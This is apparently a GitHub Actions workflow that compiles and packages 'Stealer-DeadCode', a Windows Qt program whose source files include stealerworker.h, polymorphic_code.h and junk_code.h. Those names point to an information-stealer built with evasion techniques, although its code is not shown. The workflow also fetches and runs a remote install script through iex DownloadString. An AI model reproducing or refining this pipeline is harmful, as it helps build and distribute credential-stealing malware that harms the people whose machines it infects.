name: Build DeadCode

on:
  push:
    branches:
      - main
  workflow_dispatch:
    inputs:
      cache-buster:
        description: 'Cache buster'
        default: '1'

env:
  VCPKG_COMMIT: "a73c889be74ece2c6654b580133e0e267e879255"  # Стабильный коммит vcpkg
  QT_VERSION: "5.15.2"  # Версия Qt

jobs:
  build-windows:
    runs-on: windows-latest
    timeout-minutes: 120

    steps:
    # Шаг 1: Клонирование репозитория
    - name: Checkout repository
      uses: actions/checkout@v4
      with:
        path: Stealer-DeadCode
        fetch-depth: 0

    # Шаг 2: Установка Python
    - name: Setup Python
      uses: actions/setup-python@v5
      with:
        python-version: '3.12'

    # Шаг 3: Установка Chocolatey
    - name: Install Chocolatey
      run: |
        Write-Host "Installing Chocolatey..."
        Set-ExecutionPolicy Bypass -Scope Process -Force
        [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12
        iex ((New-Object System.Net.WebClient).DownloadString('https://chocolatey.org/install.ps1'))
        if ($LASTEXITCODE -ne 0 -and $LASTEXITCODE -ne 3010) {
          Write-Host "Error: Chocolatey setup failed"
          exit 1
        }
        $env:Path = "C:\ProgramData\chocolatey\bin;" + $env:Path
        [System.Environment]::SetEnvironmentVariable("Path", $env:Path, [System.EnvironmentVariableTarget]::Process)
      shell: powershell

    # Шаг 4: Установка 7-Zip
    - name: Install 7-Zip
      run: |
        Write-Host "Installing 7-Zip..."
        choco install 7zip -y --force --no-progress --execution-timeout=600
        if ($LASTEXITCODE -ne 0 -and $LASTEXITCODE -ne 3010) {
          Write-Host "Error: Failed to install 7-Zip"
          exit 1
        }
        $env:Path = "C:\Program Files\7-Zip;" + $env:Path
        [System.Environment]::SetEnvironmentVariable("Path", $env:Path, [System.EnvironmentVariableTarget]::Process)
      shell: powershell

    # Шаг 5: Кэширование Qt
    - name: Cache Qt
      id: cache-qt
      uses: actions/cache@v4
      with:
        path: C:\Qt
        key: qt-${{ env.QT_VERSION }}-${{ runner.os }}-win64_mingw81-${{ github.event.inputs.cache-buster || '1' }}
        restore-keys: |
          qt-${{ env.QT_VERSION }}-${{ runner.os }}-win64_mingw81-

    # Шаг 6: Установка Qt и MinGW
    - name: Install Qt 5.15.2 and MinGW
      if: steps.cache-qt.outputs.cache-hit != 'true'
      run: |
        Write-Host "Installing aqtinstall..."
        python -m pip install aqtinstall==3.1.12
        Write-Host "Installing Qt 5.15.2..."
        python -m aqt install-qt windows desktop 5.15.2 win64_mingw81 -O C:/Qt --archives qtbase qttools qtsql
        if ($LASTEXITCODE -ne 0) {
          Write-Host "Error: Failed to install Qt"
          exit 1
        }
        Write-Host "Installing MinGW 8.1..."
        python -m aqt install-tool windows desktop tools_mingw qt.tools.win64_mingw810 -O C:/Qt
        if ($LASTEXITCODE -ne 0) {
          Write-Host "Error: Failed to install MinGW"
          exit 1
        }
      shell: powershell

    # Шаг 7: Проверка Qt и MinGW
    - name: Verify Qt and MinGW
      run: |
        Write-Host "Verifying Qt and MinGW..."
        $qtVersion = "${{ env.QT_VERSION }}"
        $paths = @(
          "C:\Qt\$qtVersion\mingw81_64\bin\qmake.exe",
          "C:\Qt\$qtVersion\mingw81_64\bin\uic.exe",
          "C:\Qt\Tools\mingw810_64\bin\g++.exe",
          "C:\Qt\Tools\mingw810_64\bin\mingw32-make.exe",
          "C:\Qt\$qtVersion\mingw81_64\bin\Qt5Core.dll",
          "C:\Qt\$qtVersion\mingw81_64\bin\Qt5Gui.dll",
          "C:\Qt\$qtVersion\mingw81_64\bin\Qt5Widgets.dll",
          "C:\Qt\$qtVersion\mingw81_64\bin\Qt5Network.dll",
          "C:\Qt\$qtVersion\mingw81_64\bin\Qt5Sql.dll"
        )
        foreach ($path in $paths) {
          if (-not (Test-Path $path)) {
            Write-Host "Error: $path not found"
            exit 1
          }
        }
        $env:Path = "C:\Qt\$qtVersion\mingw81_64\bin;C:\Qt\Tools\mingw810_64\bin;" + $env:Path
        [System.Environment]::SetEnvironmentVariable("Path", $env:Path, [System.EnvironmentVariableTarget]::Process)
        qmake --version
        if ($LASTEXITCODE -ne 0) {
          Write-Host "Error: qmake failed"
          exit 1
        }
        & "C:\Qt\Tools\mingw810_64\bin\g++.exe" --version
        if ($LASTEXITCODE -ne 0) {
          Write-Host "Error: g++ failed"
          exit 1
        }
      shell: powershell

    # Шаг 8: Кэширование vcpkg
    - name: Cache vcpkg
      uses: actions/cache@v4
      with:
        path: |
          C:\vcpkg
          C:\vcpkg\installed
        key: vcpkg-${{ env.VCPKG_COMMIT }}-${{ github.event.inputs.cache-buster || '1' }}
        restore-keys: |
          vcpkg-${{ env.VCPKG_COMMIT }}-

    # Шаг 9: Установка vcpkg
    - name: Setup vcpkg
      run: |
        Write-Host "Setting up vcpkg..."
        if (-not (Test-Path C:\vcpkg)) {
          git clone https://github.com/microsoft/vcpkg.git C:\vcpkg
          if ($LASTEXITCODE -ne 0) {
            Write-Host "Error: Failed to clone vcpkg"
            exit 1
          }
        }
        Set-Location C:\vcpkg
        git checkout ${{ env.VCPKG_COMMIT }}
        .\bootstrap-vcpkg.bat -disableMetrics
        if ($LASTEXITCODE -ne 0) {
          Write-Host "Error: Bootstrap failed"
          exit 1
        }
      shell: powershell

    # Шаг 10: Установка зависимостей vcpkg
    - name: Install vcpkg dependencies
      run: |
        Set-Location C:\vcpkg
        Write-Host "Installing vcpkg dependencies..."
        .\vcpkg.exe install sqlite3 curl openssl --triplet x64-mingw-static --clean-after-build
        if ($LASTEXITCODE -ne 0) {
          Write-Host "Error: Failed to install dependencies"
          exit 1
        }
      shell: powershell

    # Шаг 11: Проверка структуры проекта
    - name: Verify project structure
      run: |
        Set-Location $env:GITHUB_WORKSPACE\Stealer-DeadCode
        $requiredFiles = @(
          "ui\DeadCode.pro",
          "src\main.cpp",
          "ui\mainwindow.ui",
          "ui\mainwindow.cpp",
          "ui\mainwindow.h",
          "src\build_key.h",
          "src\polymorphic_code.h",
          "src\junk_code.h",
          "src\stealerworker.h",
          "icon.rc",
          "icon.ico",
          "config.json"
        )
        $missingFiles = $requiredFiles | Where-Object { -not (Test-Path $_) }
        if ($missingFiles) {
          Write-Host "Warning: Missing files: $missingFiles"
          # Создаём заглушку config.json, если отсутствует
          if ($missingFiles -contains "config.json") {
            Write-Host "Creating stub config.json..."
            Set-Content -Path "config.json" -Value "{}"
          }
        }
        Write-Host "Project structure verified"
      shell: powershell

    # Шаг 12: Исправление кодировки icon.rc
    - name: Fix icon.rc encoding
      run: |
        Set-Location $env:GITHUB_WORKSPACE\Stealer-DeadCode
        Write-Host "Fixing encoding of icon.rc..."
        $content = Get-Content -Path icon.rc -Raw -Encoding UTF8
        Set-Content -Path icon.rc -Value $content -NoNewline -Encoding ASCII
        Write-Host "icon.rc encoding fixed to ASCII"
      shell: powershell

    # Шаг 13: Генерация UI-файлов
    - name: Generate UI files
      run: |
        Set-Location $env:GITHUB_WORKSPACE\Stealer-DeadCode
        Write-Host "Generating ui_mainwindow.h..."
        $uicPath = "C:\Qt\${{ env.QT_VERSION }}\mingw81_64\bin\uic.exe"
        New-Item -Path "build\release" -ItemType Directory -Force
        & $uicPath ui\mainwindow.ui -o build\release\ui_mainwindow.h
        if ($LASTEXITCODE -ne 0) {
          Write-Host "Error: uic failed"
          exit 1
        }
        Write-Host "ui_mainwindow.h generated"
      shell: powershell

    # Шаг 14: Конфигурация и сборка
    - name: Configure and build
      run: |
        Set-Location $env:GITHUB_WORKSPACE\Stealer-DeadCode
        $env:Path = "C:\Qt\${{ env.QT_VERSION }}\mingw81_64\bin;C:\Qt\Tools\mingw810_64\bin;C:\vcpkg;" + $env:Path
        [System.Environment]::SetEnvironmentVariable("Path", $env:Path, [System.EnvironmentVariableTarget]::Process)
        
        # Установка временной директории
        $env:TEMP = "C:\Temp"
        $env:TMP = "C:\Temp"
        New-Item -Path "C:\Temp" -ItemType Directory -Force
        
        # Генерация BUILD_DATE и BUILD_VERSION
        $buildDate = Get-Date -Format "yyyy-MM-dd"
        $buildVersion = git rev-parse --short HEAD
        if (-not $buildVersion) { $buildVersion = "unknown" }
        
        Set-Location build
        Write-Host "Running qmake..."
        qmake ..\ui\DeadCode.pro CONFIG+=release DEFINES+="BUILD_DATE=\\\"$buildDate\\\"" DEFINES+="BUILD_VERSION=\\\"$buildVersion\\\""
        if ($LASTEXITCODE -ne 0) {
          Write-Host "Error: qmake failed"
          exit 1
        }
        
        Write-Host "Running mingw32-make..."
        mingw32-make -f Makefile.Release -j4
        if ($LASTEXITCODE -ne 0) {
          Write-Host "Error: mingw32-make failed"
          exit 1
        }
        
        if (-not (Test-Path release\DeadCode.exe)) {
          Write-Host "Error: DeadCode.exe not found"
          exit 1
        }
        Write-Host "Build completed"
      shell: powershell

    # Шаг 15: Копирование необходимых DLL и плагинов
    - name: Copy dependencies
      run: |
        Set-Location $env:GITHUB_WORKSPACE\Stealer-DeadCode\build
        $qtPluginsDir = "C:\Qt\${{ env.QT_VERSION }}\mingw81_64\plugins"
        New-Item -Path "release\platforms" -ItemType Directory -Force
        New-Item -Path "release\sqldrivers" -ItemType Directory -Force
        Copy-Item -Path "$qtPluginsDir\platforms\qwindows.dll" -Destination "release\platforms\"
        Copy-Item -Path "$qtPluginsDir\sqldrivers\qsqlite.dll" -Destination "release\sqldrivers\"
        Write-Host "Copied Qt plugins"
      shell: powershell

    # Шаг 16: Тестирование запуска
    - name: Test DeadCode.exe
      run: |
        Set-Location $env:GITHUB_WORKSPACE\Stealer-DeadCode\build
        $env:Path = "C:\Qt\${{ env.QT_VERSION }}\mingw81_64\bin;C:\Qt\Tools\mingw810_64\bin;" + $env:Path
        Write-Host "Running DeadCode.exe..."
        Start-Process -FilePath "release\DeadCode.exe" -ArgumentList "--test" -NoNewWindow -Wait -RedirectStandardOutput "test_output.log" -RedirectStandardError "test_error.log"
        Write-Host "Test output:"
        Get-Content "test_output.log" -ErrorAction SilentlyContinue
        Write-Host "Test errors:"
        Get-Content "test_error.log" -ErrorAction SilentlyContinue
      shell: powershell

    # Шаг 17: Создание артефакта
    - name: Create artifact
      run: |
        Set-Location $env:GITHUB_WORKSPACE\Stealer-DeadCode\build
        7z a DeadCode-Build.zip .\release\*
        if ($LASTEXITCODE -ne 0) {
          Write-Host "Error: Failed to create zip archive"
          exit 1
        }
      shell: powershell

    # Шаг 18: Загрузка артефакта
    - name: Upload artifact
      uses: actions/upload-artifact@v4
      with:
        name: DeadCode-Build
        path: $env:GITHUB_WORKSPACE\Stealer-DeadCode\build\DeadCode-Build.zip
        if-no-files-found: error

    # Шаг 19: Очистка
    - name: Cleanup
      if: always()
      run: |
        Remove-Item -Path "$env:GITHUB_WORKSPACE\Stealer-DeadCode\build" -Recurse -Force -ErrorAction SilentlyContinue
      shell: powershell